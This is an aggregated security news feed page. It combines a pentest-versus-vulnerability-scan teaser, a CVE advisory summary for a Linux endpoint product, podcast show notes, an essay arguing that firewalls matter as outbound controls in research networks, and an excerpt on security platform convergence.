  • e2c2d8bad36ac3e446797c485ce8b394


  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

Penetration Tests vs. Vulnerability Scans: Understanding the Differences

Penetration tests and vulnerability scans are related but different cyber security services The difference between penetration tests and vulnerability scans is a common source of confusion. While both are important tools for cyber risk analysis and are mandated under PCI DSS, HIPAA, and other security standards and frameworks, they are quite different. Let’s examine the… Read More

The post Penetration Tests vs. Vulnerability Scans: Understanding the Differences appeared first on .

CVE-2018-6693 (endpoint_security_for_linux_threat_prevention, endpoint_security_linux_threat_prevention)

An unprivileged user can delete arbitrary files on a Linux system running ENSLTP 10.5.1, 10.5.0, and 10.2.3 Hotfix 1246778 and earlier. By exploiting a time of check to time of use (TOCTOU) race condition during a specific scanning sequence, the unprivileged user is able to perform a privilege escalation to delete arbitrary files.

Drone Assassins, Security Shaming, and Zero-Day – Hack Naked News #189

Drone assassins are cheap, deadly, and at your local store, State Department shamed, MS-ISAC releases advisory advisory PHP vulnerabilities, a nasty piece of CSS code, a Zero-Day bug in CCTV surveillance cameras, and FreeBSD has its own TCP-queue-of-death bug! Jason Wood's expert commentary on The Effectiveness of Publicly Shaming Bad Security!

Full Show Notes: Visit to get all the latest episodes!

Firewalls and the Need for Speed

I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:

This bothered me, so I Tweeted about it.

This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:

What do you think of this architecture?

My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

Implementing these non-firewall-based security choices requries a high degree of diligence, which requires visibility. I did not see this emphasized in the NSRC presentation. For example:

These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.

I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhance monitoring for the networks discussed above, and think carefully about enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

Convergence is the Key to Future-Proofing Security

I published a new article today on the Oracle Security blog that looks at the benefits of convergence in the security space as the IT landscape grows more disparate and distributed.

Security professionals have too many overlapping products under management and it's challenging to get quick and complete answers across hybrid, distributed environments. It's challenging to fully automate detection and response. There is too much confusion about where to get answers, not enough talent to cover the skills requirement, and significant hesitation to put the right solutions in place because there's already been so much investment.

Here's are a couple of excerpts:
Here’s the good news: Security solutions are evolving toward cloud, toward built-in intelligence via Machine Learning, and toward unified, integrated-by-design platforms. This approach eliminates the issues of product overlap because each component is designed to leverage the others. It reduces the burden related to maintaining skills because fewer skills are needed and the system is more autonomous. And, it promotes immediate and automated response as opposed to indecision. While there may not be a single platform to replace all 50 or 100 of your disparate security products today, platforms are emerging that can address core security functions while simplifying ownership and providing open integration points to seamlessly share security intelligence across functions.
 Forward-looking security platforms will leverage hybrid cloud architecture to address hybrid cloud environments. They’re autonomous systems that operate without relying on human maintenance, patching, and monitoring. They leverage risk intelligence from across the numerous available sources. And then they rationalize that data and use Machine Learning to generate better security intelligence and feed that improved intelligence back to the decision points. And they leverage built-in integration points and orchestration functionality to automate response when appropriate.
Click to read the full article: Convergence is the Key to Future-Proofing Security